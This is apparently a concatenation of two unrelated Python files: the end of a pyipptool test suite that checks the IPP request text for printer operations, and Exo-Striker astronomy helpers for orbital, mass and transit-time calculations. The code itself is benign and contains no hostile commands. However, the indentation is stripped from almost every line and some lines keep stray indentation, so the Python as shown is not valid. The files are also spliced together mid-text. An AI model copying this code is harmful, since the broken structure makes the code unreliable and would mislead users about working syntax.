}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_get_printer_attributes(_call_ipptool):
from pyipptool import get_printer_attributes
_call_ipptool.return_value = {'Tests': [{}]}
get_printer_attributes(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Get Printer Attributes"
OPERATION "Get-Printer-Attributes"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_get_subscriptions(_call_ipptool):
from pyipptool import get_subscriptions
_call_ipptool.return_value = {'Tests': [{}]}
get_subscriptions(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Get Subscriptions"
OPERATION "Get-Subscriptions"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_get_notifications(_call_ipptool):
from pyipptool import get_notifications
_call_ipptool.return_value = {'Tests': [{}]}
get_notifications(printer_uri='ipp://cups:631/printers/p',
notify_subscription_ids=3)
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Get Notifications"
OPERATION "Get-Notifications"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
ATTR integer notify-subscription-ids 3
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_pause_printer(_call_ipptool):
from pyipptool import pause_printer
_call_ipptool.return_value = {'Tests': [{}]}
pause_printer(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Pause Printer"
OPERATION "Pause-Printer"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_hold_new_jobs(_call_ipptool):
from pyipptool import hold_new_jobs
_call_ipptool.return_value = {'Tests': [{}]}
hold_new_jobs(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Hold New Jobs"
OPERATION "Hold-New-Jobs"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_release_held_new_jobs(_call_ipptool):
from pyipptool import release_held_new_jobs
_call_ipptool.return_value = {'Tests': [{}]}
release_held_new_jobs(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Release Held New Jobs"
OPERATION "Release-Held-New-Jobs"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_resume_printer(_call_ipptool):
from pyipptool import resume_printer
_call_ipptool.return_value = {'Tests': [{}]}
resume_printer(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Resume Printer"
OPERATION "Resume-Printer"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cancel_subscription(_call_ipptool):
from pyipptool import cancel_subscription
_call_ipptool.return_value = {'Tests': [{}]}
cancel_subscription(printer_uri='ipp://cups:631/printers/p',
notify_subscription_id=3)
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Cancel Subscription"
OPERATION "Cancel-Subscription"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
ATTR integer notify-subscription-id 3
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_create_job(_call_ipptool):
from pyipptool import create_job
_call_ipptool.return_value = {'Tests': [{}]}
create_job(printer_uri='ipp://cups:631/classes/p',
job_name='foo',
job_priority=1,
job_hold_until='indefinite',
job_sheets='standard',
multiple_document_handling='single-document',
copies=2,
finishings='punch',
page_ranges='1-6',
sides='two-sided-short-edge',
number_up=4,
orientation_requested='reverse-landscape',
media='iso-a4-white',
printer_resolution='600dpi',
print_quality='5',
ipp_attribute_fidelity=False,
job_k_octets=1024,
job_impressions=2048,
job_media_sheets=2,
auth_info='michael',
job_billing='no-idea',
)
request = _call_ipptool._mock_mock_calls[0][1][-1]
expected_request = textwrap.dedent("""
{
NAME "Create Job"
OPERATION "Create-Job"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/classes/p
ATTR name job-name foo
ATTR boolean ipp-attribute-fidelity 0
ATTR integer job-k-octets 1024
ATTR integer job-impressions 2048
ATTR integer job-media-sheets 2
GROUP job-attributes-tag
ATTR integer job-priority 1
ATTR keyword job-hold-until indefinite
ATTR keyword job-sheets standard
ATTR text auth-info "michael"
ATTR text job-billing "no-idea"
ATTR keyword multiple-document-handling single-document
ATTR integer copies 2
ATTR enum finishings punch
ATTR rangeOfInteger page-ranges 1-6
ATTR keyword sides two-sided-short-edge
ATTR integer number-up 4
ATTR enum orientation-requested reverse-landscape
ATTR keyword media iso-a4-white
ATTR resolution printer-resolution 600dpi
ATTR enum print-quality 5
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_print_job(_call_ipptool):
from pyipptool import print_job
_call_ipptool.return_value = {'Tests': [{}]}
filename = os.path.join(os.path.dirname(__file__), 'hello.pdf')
with open(filename, 'rb') as tmp:
print_job(printer_uri='ipp://cups:631/classes/p',
job_name='foo',
requesting_user_name='john-rambo',
ipp_attribute_fidelity=False,
document_name='foo.txt',
compression='gzip',
document_format='text/plain',
document_natural_language='en',
job_k_octets=1024,
job_impressions=2048,
job_media_sheets=2,
job_priority=1,
job_hold_until='indefinite',
job_sheets='standard',
auth_info='michael',
job_billing='no-idea',
multiple_document_handling='single-document',
copies=2,
finishings='punch',
page_ranges='1-6',
sides='two-sided-short-edge',
number_up=4,
orientation_requested='reverse-landscape',
media='iso-a4-white',
printer_resolution='600dpi',
print_quality='5',
document_content=tmp.read(),
ezeep_job_uuid='bla')
request = _call_ipptool._mock_mock_calls[0][1][-1]
expected_request = textwrap.dedent("""
{
NAME "Print Job"
OPERATION "Print-Job"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/classes/p
ATTR name requesting-user-name john-rambo
ATTR name job-name foo
ATTR boolean ipp-attribute-fidelity 0
ATTR integer job-k-octets 1024
ATTR integer job-impressions 2048
ATTR integer job-media-sheets 2
ATTR name document-name foo.txt
ATTR keyword compression gzip
ATTR mimeMediaType document-format text/plain
ATTR naturalLanguage document-natural-language en
GROUP job-attributes-tag
ATTR integer job-priority 1
ATTR keyword job-hold-until indefinite
ATTR keyword job-sheets standard
ATTR text auth-info "michael"
ATTR text job-billing "no-idea"
ATTR keyword multiple-document-handling single-document
ATTR integer copies 2
ATTR enum finishings punch
ATTR rangeOfInteger page-ranges 1-6
ATTR keyword sides two-sided-short-edge
ATTR integer number-up 4
ATTR enum orientation-requested reverse-landscape
ATTR keyword media iso-a4-white
ATTR resolution printer-resolution 600dpi
ATTR enum print-quality 5
ATTR text ezeep-job-uuid "bla"
GROUP subscription-attributes-tag
GROUP document-attributes-tag
FILE /tmp/
}""").strip()
    assert ('\n'.join(request.splitlines()[:-2])
            == '\n'.join(expected_request.splitlines()[:-2])), request
    # Check the actual request; its FILE path points at a random temporary file.
    assert request.splitlines()[-2].startswith('FILE /tmp/')
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_send_document_with_file(_call_ipptool):
from pyipptool import send_document
_call_ipptool.return_value = {'Tests': [{}]}
with tempfile.NamedTemporaryFile('rb') as tmp:
send_document(printer_uri='ipp://cups:631/printers/p',
requesting_user_name='you',
document_content=tmp)
request = _call_ipptool._mock_mock_calls[0][1][-1]
expected_request = textwrap.dedent("""
{
NAME "Send Document"
OPERATION "Send-Document"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
ATTR name requesting-user-name you
ATTR mimeMediaType document-format application/pdf
ATTR boolean last-document 1
GROUP document-attributes-tag
FILE %s
}""" % tmp.name).strip()
assert request == expected_request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_send_document_with_binary(_call_ipptool):
from pyipptool import send_document
_call_ipptool.return_value = {'Tests': [{}]}
with open(os.path.join(os.path.dirname(__file__),
'hello.pdf'), 'rb') as tmp:
send_document(document_content=tmp.read())
assert 'FILE /tmp/' in _call_ipptool._mock_mock_calls[0][1][-1]
|
functions.py
|
#!/usr/bin/python3
__author__ = 'Trifon Trifonov'
import sys, os
#sys.path.insert(0, '../lib')
import numpy as np
import jac2astrocen
import corner
import matplotlib
matplotlib.pyplot.switch_backend('Agg')
import re
from subprocess import PIPE, Popen
import signal
import platform
import tempfile, shutil
from threading import Thread
from .Warning_log import Warning_log
import scipy.stats as pdf
import dill
from scipy.signal import argrelextrema
from scipy.ndimage import gaussian_filter
import random
import string
import ntpath
import gls as gls
TAU= 2.0*np.pi
def check_for_missing_instances(fit,fit_new):
for iii in fit.__dict__:
if iii not in fit_new.__dict__:
fit_new.__dict__[iii] = dill.copy(fit.__dict__[iii])
# elif iii in fit_new.__dict__ and len(np.atleast_1d(fit_new.__dict__[iii])) != len(np.atleast_1d(fit.__dict__[iii])):
# fit_new.__dict__[iii] = dill.copy(fit.__dict__[iii])
for iii in fit.fit_results.__dict__:
if iii not in fit_new.fit_results.__dict__:
fit_new.fit_results.__dict__[iii] = dill.copy(fit.fit_results.__dict__[iii])
if len(np.atleast_1d(fit_new.ns_sampler))!=0:
try:
fit_new.ns_sampler._lbf = dill.copy(fit_new.ns_sampler.lbf)
except:
pass
if len(np.atleast_1d(fit_new.mcmc_sampler))!=0:
try:
fit_new.mcmc_sampler._lbf = dill.copy(fit_new.mcmc_sampler.lbf)
except:
pass
if len(fit_new.tra_colors) <= 11:
fit_new.tra_colors = dill.copy(fit.tra_colors)
fit_new.tra_quadtr_jeff_pr = dill.copy(fit.tra_quadtr_jeff_pr)
fit_new.tra_jitt_use = {k: False for k in range(20)}
fit_new.tra_off_use = {k: False for k in range(20)}
fit_new.tra_dil_use = {k: False for k in range(20)}
fit_new.init_tra_jitter()
fit_new.init_tra_offset()
fit_new.init_tra_dilution()
fit_new.init_tra_lintr()
fit_new.init_tra_quadtr()
fit_new.cwd = dill.copy(fit.cwd)
return fit_new
################################## Version control #######################################
def check_fortran_routines(path='./'):
if not os.path.exists("%s/lib/libswift.a"%path):
print("Installing the swift N-body lib for a first time!")
result6, flag6 = run_command_with_timeout('%s/install_swift.sh'%path, 600,output=True)
#print(result6)
print("Installation DONE!")
version_kep_loglik= "0.07"
result1, flag1 = run_command_with_timeout('%s/lib/fr/loglik_kep -version'%path, 1,output=True)
if flag1 == -1 or str(result1[0][0]) != version_kep_loglik:
print("New source code available: Updating Keplerian Simplex")
result1, flag1 = run_command_with_timeout('gfortran -O3 %s/source/latest_f/kepfit_amoeba.f -o %s/lib/fr/loglik_kep'%(path,path), 15,output=True)
result1, flag1 = run_command_with_timeout('%s/lib/fr/loglik_kep -version'%path, 1,output=True)
version_kep_LM= "0.07"
result2, flag2 = run_command_with_timeout('%s/lib/fr/chi2_kep -version'%path, 1,output=True)
if flag2 == -1 or str(result2[0][0]) != version_kep_LM:
print("New source code available: Updating Keplerian L-M")
result2, flag2 = run_command_with_timeout('gfortran -O3 %s/source/latest_f/kepfit_LM.f -o %s/lib/fr/chi2_kep'%(path,path), 15,output=True)
result2, flag2 = run_command_with_timeout('%s/lib/fr/chi2_kep -version'%path, 1,output=True)
version_dyn_loglik= "0.09"
result3, flag3 = run_command_with_timeout('%s/lib/fr/loglik_dyn -version'%path, 1,output=True)
if flag3 == -1 or str(result3[0][0]) != version_dyn_loglik:
print("New source code available: Updating N-body Simplex")
result3, flag3 = run_command_with_timeout('gfortran -O3 %s/source/latest_f/dynfit_amoeba.f -o %s/lib/fr/loglik_dyn'%(path,path),15,output=True)
result3, flag3 = run_command_with_timeout('%s/lib/fr/loglik_dyn -version'%path, 1,output=True)
version_dyn_LM= "0.07"
result4, flag4 = run_command_with_timeout('%s/lib/fr/chi2_dyn -version'%path, 1,output=True)
if flag4 == -1 or str(result4[0][0]) != version_dyn_LM:
print("New source code available: Updating N-body L-M")
result4, flag4 = run_command_with_timeout('gfortran -O3 %s/source/latest_f/dynfit_LM.f -o %s/lib/fr/chi2_dyn'%(path,path), 15,output=True)
result4, flag4 = run_command_with_timeout('%s/lib/fr/chi2_dyn -version'%path, 1,output=True)
version_dyn_loglik_= "0.06"
result5, flag5 = run_command_with_timeout('%s/lib/fr/loglik_dyn+ -version'%path, 1,output=True)
if flag5 == -1 or str(result5[0][0]) != version_dyn_loglik_:
print("New source code available: Updating Mixed Simplex")
result5, flag5 = run_command_with_timeout('gfortran -O3 %s/source/latest_f/dynfit_amoeba+.f -o %s/lib/fr/loglik_dyn+'%(path,path), 15,output=True)
result5, flag5 = run_command_with_timeout('%s/lib/fr/loglik_dyn+ -version'%path, 1,output=True)
try:
r1 = float(result1[0][0])
r2 = float(result2[0][0])
r3 = float(result3[0][0])
r4 = float(result4[0][0])
r5 = float(result5[0][0])
except (ImportError, KeyError, AttributeError,ValueError, IndexError) as e:
result6, flag6 = run_command_with_timeout('gfortran -v', 15,output=True)
print("""
Something went wrong!!!
Perhaps you do not have user permission to compile code in the Exo-Striker directory?
Or perhaps, you do not have 'gfortran' installed?
Trying
$ gfortran -v
returned:
%s
If 'gfortran' is not found, please install it and try again. Else, please open a GitHub issue here:
https://github.com/3fon3fonov/exostriker/issues
"""%result6
)
def transit_tperi_old(per, ecc, om, ma, epoch):
"""It derives Time of periatron [tp]
and time of mid transit [t0]
Parameters
----------
per : float
Period of the planet [days].
ecc : float
Eccentricity of the orbit.
om : float
Argument of periastron [deg]
ma : float
Mean anomaly [deg].
epoch : float
Epoch for wich the orbital elements are valid [BJD].
Returns
-------
[tp,t0]
if the epoch in is BJD then tp and t0 are also in BJD.
"""
om = np.radians(om)
ma = np.radians(ma)
E = 2.0*np.arctan( np.sqrt( ( (1.0-ecc)/(1.0+ecc) ) ) * np.tan( (np.pi/4.0)-(om/2.0) ) )
t_peri = epoch - ((ma/TAU)*per)
t_transit = t_peri + (E + ecc*np.sin(E)) * (per/TAU)
return t_peri, t_transit
def transit_tperi(per, ecc, om, ma, epoch, primary = True):
"""It derives Time of periatron [tp]
and time of mid transit [t0]
Parameters
----------
per : float
Period of the planet [days].
ecc : float
Eccentricity of the orbit.
om : float
Argument of periastron [deg]
ma : float
Mean anomaly [deg].
epoch : float
Epoch for wich the orbital elements are valid [BJD].
Returns
-------
[tp,t0]
if the epoch in is BJD then tp and t0 are also in BJD.
"""
trueA = np.pi/2.0
om = np.radians((om)%360)
#ma = np.radians(ma)
f = trueA - om
E = 2.0*np.arctan( np.sqrt( (1.0-ecc)/(1.0+ecc) ) * np.tan(f/2.0) )
t_peri = epoch - (per/TAU)*(E - ecc*np.sin(E))
t_transit = t_peri + (E - ecc*np.sin(E)) * (per/TAU)
if primary != True:
trueA = 3.0 * np.pi/2.0
f = trueA - om
E = 2.0*np.arctan( np.sqrt( (1.0-ecc)/(1.0+ecc) ) * np.tan(f/2.0) )
t_transit = t_peri + (E - ecc*np.sin(E)) * (per/TAU)
return t_peri, t_transit
return t_peri, t_transit
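# A tiny sanity check with made-up values: for a circular orbit (ecc=0) seen with
# omega=90 deg, f=0 and E=0 in the parameterisation above, so both the returned
# time of periastron and the mid-transit time equal the input epoch.
def _transit_tperi_demo():
    t_peri, t0 = transit_tperi(per=10.0, ecc=0.0, om=90.0, ma=0.0, epoch=2458000.0)
    return t_peri, t0  # both equal 2458000.0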
def get_m0(per, ecc, om, t0, epoch):
'''
'''
om = np.radians(om)
f = np.pi/2.0 - om
E = 2.0*np.arctan( np.sqrt( (1.0-ecc)/(1.0+ecc) ) * np.tan(f/2.0) )
# t_peri = epoch - (per/TAU)*(E - ecc*np.sin(E))
# print(t_peri)
# t0 = 2458334.3166
#m0 = E - ecc*np.sin(E) + 2.0*np.pi*( (epoch-t0)/per % 1.)
#ma = np.degrees(ma)%360.0
ma = E - ecc*np.sin(E)
m0 = ma + 2.0*np.pi*( (epoch-t0)/per % 1.)
#m0 = ma - (t0-epoch)* 2.0*np.pi/per
m0 = np.degrees(m0)%360.0
return m0
def ma_from_epoch(per, t_peri, epoch):
'''
'''
ma = np.degrees(2.0*np.pi*( (epoch-t_peri)/per % 1.))
return ma
def mass_to_K(P,ecc,incl, pl_mass,Stellar_mass):
    '''Return the RV semi-amplitude K in [m/s].
    Parameters
    ----------
    P : float
        Period of the planet in [d].
    ecc : float
        Eccentricity.
    incl : float
        Inclination in [deg].
    pl_mass : float
        Planet mass in [Msol].
    Stellar_mass : float
        Primary mass in [Msol].
    Returns
    -------
    float
        K in [m/s].
    '''
THIRD = 1.0/3.0
GMSUN = 1.32712497e20
AU=1.49597892e11
T = P*86400.0
#K = ((2.0*np.pi*GMSUN)/T)**THIRD * (pl_mass*np.sin(np.radians(incl)) /
# (Stellar_mass+pl_mass)**(2.0/3.0)) * 1.0/np.sqrt(1.0-ecc**2.0)
# K = ((2.0*np.pi*GMSUN)/T)**THIRD * (pl_mass*np.sin(np.radians(incl)) /
# (Stellar_mass+pl_mass)**(2.0/3.0))
K = ((2.0*np.pi*GMSUN)/T)**THIRD * (pl_mass*np.sin(np.radians(incl)) /
(Stellar_mass+pl_mass)**(2.0/3.0)) * 1.0/np.sqrt(1.0-ecc**2.0)
return K
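# An illustrative call with made-up (Jupiter-analogue) numbers: a ~1 Mjup planet
# (~9.55e-4 Msol) on Jupiter's ~4332.6 d orbit around a 1 Msol star seen edge-on
# yields a semi-amplitude of roughly 12-13 m/s.
def _mass_to_K_demo():
    K = mass_to_K(P=4332.59, ecc=0.0489, incl=90.0,
                  pl_mass=9.546e-4, Stellar_mass=1.0)
    return K  # ~12.5 m/s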
def get_mass(K, P, ecc, i, Stellar_mass):
    '''Return the planet mass in Jupiter masses [Mj].
    Parameters
    ----------
    K : float
        Semi-amplitude of the RV signal in [m/s].
    P : float
        Period of the planet in [d].
    ecc : float
        Eccentricity.
    i : float
        Inclination in [deg].
    Stellar_mass : float
        Primary mass in [Msol].
    Returns
    -------
    float
        Planet mass in [Mj].
    '''
T = P*86400.0
THIRD = 1.0/3.0
GMSUN = 1.32712497e20
msini = (T/(2.0*np.pi*GMSUN))**THIRD * K * Stellar_mass**(2./3) * np.sqrt(1.0-ecc**2.0)
msini = msini/np.sin(np.radians(i))*1047.70266835
return msini
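# The inverse direction, again with made-up values: a 12.5 m/s signal on the same
# orbit with an edge-on inclination maps back to roughly one Jupiter mass,
# consistent with the sketch after mass_to_K above.
def _get_mass_demo():
    msini = get_mass(K=12.5, P=4332.59, ecc=0.0489, i=90.0, Stellar_mass=1.0)
    return msini  # ~1.0 Mjup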
def get_gravity(m_p, r_p):
    '''Return the surface gravity in [m/s^2].
    Parameters
    ----------
    m_p : float
        Planet mass in [kg].
    r_p : float
        Planet radius in [m].
    Returns
    -------
    float
        g in [m/s^2].
    '''
G = 6.67e-11
return G*m_p/r_p**2
def a_to_P(a,m0):
GMSUN = 1.32712497e20
AU=1.49597892e11
T = np.sqrt( (a*AU)**3.0 * (2.0*np.pi)**2.0 /(GMSUN*(m0)))
T = T /86400.0
return T
def P_to_a(P,m0):
GMSUN = 1.32712497e20
AU=1.49597892e11
P = P * 86400.0
a = ((P**2.0 * (GMSUN*(m0)))/(4.0*(np.pi)**2.0))**(1.0/3.0)
return a/AU
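# A quick Kepler's-third-law round trip with Earth-like numbers (illustration only):
# a 365.25 d period around 1 Msol corresponds to ~1 AU, and 1 AU maps back to ~365 d.
def _kepler_third_law_demo():
    a_earth = P_to_a(365.25, 1.0)  # ~1.0 AU
    p_earth = a_to_P(1.0, 1.0)     # ~365 d
    return a_earth, p_earth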
def get_transit_times(tr_res, p, t0, precise = False, verbose=False):
    '''Return [transit indices, approximate mid-transit times]: for each epoch of
    the linear ephemeris t0 + i*p, the time of the flux minimum within a small
    window is taken as the transit time (approximate!).
    '''
#t_ind = np.where(np.logical_and(t >= t0-0.17, t <= t0+0.17))
#transits = t0 + p
t = tr_res[2][0]
f = tr_res[2][3]
range_ = int(max(t-t[0])/p)+1
tr_index = []
tr_t0 = []
#tran_t0 = t0
for i in range(range_):
tran_t0 = t0 + p*i
tr_ind = np.where(np.logical_and(t >= tran_t0-0.17, t <= tran_t0+0.17))
#print(i,tran_t0)
if len(t[tr_ind]) !=0:
minn = np.argmin(f[tr_ind])
tr_index.append(i)
tr_t0.append(t[tr_ind][minn])
if precise:
t = tr_res[3][0]
f = tr_res[3][1]
tr_t0 = []
for i in tr_index:
tran_t0 = t0 + p*i
tr_ind = np.where(np.logical_and(t >= tran_t0-0.07, t <= tran_t0+0.07))
minn = np.argmin(f[tr_ind])
tr_t0.append(t[tr_ind][minn])
if verbose == True:
for i in range(len(tr_index)):
print(tr_index[i],tr_t0[i])
return [tr_index, tr_t0]
####################### mass_semimajor ###########################################
def get_mass_a(obj, mass_type="J"):
    '''Calculate the actual masses and Jacobi semimajor axes of a
    system using the parameters P, K and e from a Kepler fit.
    The output semi-major axis is in AU.
    If mass_type="J" the mass is in Jupiter masses (default).
    If mass_type="E" the mass is in Earth masses.
    Otherwise, e.g. mass_type="", the mass is in Solar units.
    '''
THIRD = 1.0/3.0
PI = 3.14159265358979e0
TWOPI = 2.0*PI
GMSUN = 1.32712497e20
AU=1.49597892e11
mass = np.zeros(10)
ap = np.zeros(9)
pl_mass = np.zeros(9)
mpold = pl_mass
#*******G is set to be unit, and s, m, kg as unit of time, length and mass
#***** and there is a reason for that! later I might correct for that.
mtotal = obj.st_mass[0]
f = 5e-6
for i in range(obj.npl):
T = obj.P[i]*86400.0
mass[0] = obj.st_mass[0]
        # we need an initial guess for each planet mass
dm = 0
mass[i+1] = abs(obj.K[i])*(T*(obj.st_mass[0])**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-obj.e[i]**2.0)/abs(np.sin(np.radians(obj.i[i])))
mpold[i] = mass[i+1]
# This is a simple iteration to solve for mp
while (dm <= 0):
if i == 0:
mtotal = obj.st_mass[0]
mass[i+1] = abs(obj.K[i])*(T*(obj.st_mass[0] + mpold[i])**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-obj.e[i]**2.0)/abs(np.sin(np.radians(obj.i[i])))
mtotal = obj.st_mass[0]
for j in range(i):
mtotal = mtotal + mass[j+1]
mass[i+1] = abs(obj.K[i])*(T*(mtotal + mpold[i])**2.0/(TWOPI*GMSUN))**THIRD * np.sqrt(1.0-obj.e[i]**2.0)/abs(np.sin(np.radians(obj.i[i])))
dm = (mpold[i] - mass[i+1])
mpold[i] = mpold[i] + f
# print mass[i+1], mpold[i]
ap[i] = (GMSUN*(mtotal + mass[i+1])*(T/TWOPI)**2)**THIRD
# for i in range(npl+1):
# mass[i] = mass[i]*GMSUN
for i in range(obj.npl):
ap[i] = ap[i]/AU # to be in AU
if mass_type=="J":
pl_mass[i] = mass[i+1]*1047.70266835 # to be in Jup. masses
elif mass_type=="E":
pl_mass[i] = mass[i+1]*1047.70266835 * 317.82838 # to be in Earth. masses
else:
pl_mass[i] = mass[i+1]
# I have seen that 1 Sol Mass = 1047.92612 Jup. masses???
return pl_mass,ap
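# A minimal sketch of calling get_mass_a with a hypothetical single-planet system
# (Jupiter analogue around a 1 Msol star); only the attributes read by the function
# are provided. Expected output is roughly 1 Mjup and ~5.2 AU.
def _get_mass_a_demo():
    from types import SimpleNamespace

    obj = SimpleNamespace(st_mass=[1.0], npl=1,
                          P=[4332.59], K=[12.5], e=[0.0489], i=[90.0])
    pl_mass, ap = get_mass_a(obj, mass_type="J")
    return pl_mass[0], ap[0]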
def LoadSession(input_file, template_session = None):
try:
file_pi = open(input_file, 'rb')
fit_new = dill.load(file_pi) #, encoding='latin1'
file_pi.close()
except (UnicodeDecodeError, ImportError, KeyError) as e:
py3_ses = convert_Session_to_Py3(input_file)
file_pi = open(py3_ses, 'rb')
fit_new = dill.load(file_pi) #, encoding='latin1'
file_pi.close()
if template_session != None:
fit_new = check_for_missing_instances(template_session,fit_new)
#self.check_for_missing_instances(fit_new)
#self.check_settings()
check_temp_RV_file(fit_new)
return fit_new
def convert_Session_to_Py3(old_ses):
"""
    Convert a Python 2 session to Python 3
"""
# Make a name for the new pickle
new_ses = os.path.splitext(os.path.basename(old_ses))[0]+"_p3.ses"
# Convert Python 2 "ObjectType" to Python 3 object
dill._dill._reverse_typemap["ObjectType"] = object
# Open the pickle using latin1 encoding
with open(old_ses, "rb") as f:
loaded = dill.load(f, encoding="latin1")
f.close()
# Re-save as Python 3 pickle
with open(new_ses, "wb") as outfile:
dill.dump(loaded, outfile)
outfile.close()
return new_ses
def fix_old_to_session_tra(old_ses):
    ################ Some problems with old sessions are fixed here. To be removed later on. #############
if len(old_ses.tra_data_sets) == 20:
return old_ses
else:
for i in range(10):
old_ses.tra_data_sets[10 + i] = []
old_ses.tra_data_sets_init[10 + i] = []
old_ses.ld_m = ["quadratic"]*20 #limb darkening model
old_ses.ld_u[10 + i] = [0.12, 0.35 ]
old_ses.ld_u_lin[10 + i] = [0.35]
old_ses.ld_u_quad[10 + i] = [0.12, 0.35 ]
old_ses.ld_u_nonlin[10 + i] = [0.55,0.12, 0.35,-0.11]
old_ses.ld_u_lin_use[10 + i] = [False]
old_ses.ld_u_quad_use[10 + i] = [False, False]
old_ses.ld_u_nonlin_use[10 + i] = [False, False,False, False]
old_ses.ld_u_lin_err[10 + i] = [[0.0,0.0]]
old_ses.ld_u_quad_err[10 + i] = [[0.0,0.0], [0.0,0.0]]
old_ses.ld_u_nonlin_err[10 + i] = [[0.0,0.0], [0.0,0.0],[0.0,0.0], [0.0,0.0]]
old_ses.ld_u_lin_bound[10 + i] = np.array([[-1.0,1.0]])
old_ses.ld_u_quad_bound[10 + i] = np.array([[-1.0,1.0],[-1.0,1.0]])
old_ses.ld_u_nonlin_bound[10 + i] = np.array([[-1.0,1.0],[-1.0,1.0],[-1.0,1.0],[-1.0,1.0]])
old_ses.ld_u_lin_norm_pr[10 + i] = np.array([[0.1,0.05, False]])
old_ses.ld_u_quad_norm_pr[10 + i] = np.array([[0.0,1.0, False],[0.0,1.0, False]])
old_ses.ld_u_nonlin_norm_pr[10 + i] = np.array([[0.0,1.0, False],[0.0,1.0, False],[0.0,1.0, False],[0.0,1.0, False]])
old_ses.ld_u_lin_jeff_pr[10 + i] = np.array([[0.1,0.05, False]])
old_ses.ld_u_quad_jeff_pr[10 + i] = np.array([[0.0,1.0, False],[0.0,1.0, False]])
old_ses.ld_u_nonlin_jeff_pr[10 + i] = np.array([[0.0,1.0, False],[0.0,1.0, False],[0.0,1.0, False],[0.0,1.0, False]])
old_ses.ld_u_lin_str[10 + i] = [r'ld-quad-1$_%s$'%str(10 + i+1)]
old_ses.ld_u_quad_str[10 + i] = [r'ld-quad-1$_%s$'%str(10 + i+1),r'ld-quad-2$_%s$'%str(10 + i+1)]
old_ses.ld_u_nonlin_str[10 + i] = [r'ld-quad-1$_%s$'%str(10 + i+1),r'ld-quad-2$_%s$'%str(10 + i+1),r'ld-quad-3$_%s$'%str(10 + i+1),r'ld-quad-4$_%s$'%str(10 + i+1)]
old_ses.ld_gr.append(10 + i)
old_ses.ld_gr_ind.append(10 + i)
for i in range(20):
if len(old_ses.tra_data_sets[i]) != 0:
if len(old_ses.tra_data_sets[i]) ==11:
old_ses.tra_data_sets[i] = np.insert(old_ses.tra_data_sets[i], 9, True)
old_ses.tra_data_sets_init[i] = np.insert(old_ses.tra_data_sets_init[i], 9, True)
elif len(old_ses.tra_data_sets[i]) ==10:
old_ses.tra_data_sets[i] = np.insert(old_ses.tra_data_sets[i], 9, True)
old_ses.tra_data_sets_init[i] = np.insert(old_ses.tra_data_sets_init[i], 9, False)
old_ses.tra_data_sets[i] = np.insert(old_ses.tra_data_sets[i], 10, True)
old_ses.tra_data_sets_init[i] = np.insert(old_ses.tra_data_sets_init[i], 10, False)
return old_ses
########################################################################################################
def find_close_elements(a, b, precision = 0.01):
"""Finds close elements in two arrays with diffrent sizes.
Parameters
----------
a : array of floats with dimention of N
Description of parameter `a`.
b : array of floats with dimention of M
Description of parameter `b`.
precision : threshold withing which two elements are considered the same.
Description of parameter `precision`.
Returns
-------
[array, array]
returns two arrays with the elements that mathched withing the
precision.
"""
return [[x for x in a for i in b if abs(x - i) < precision], [x for x in b for i in a if abs(x - i) < precision]]
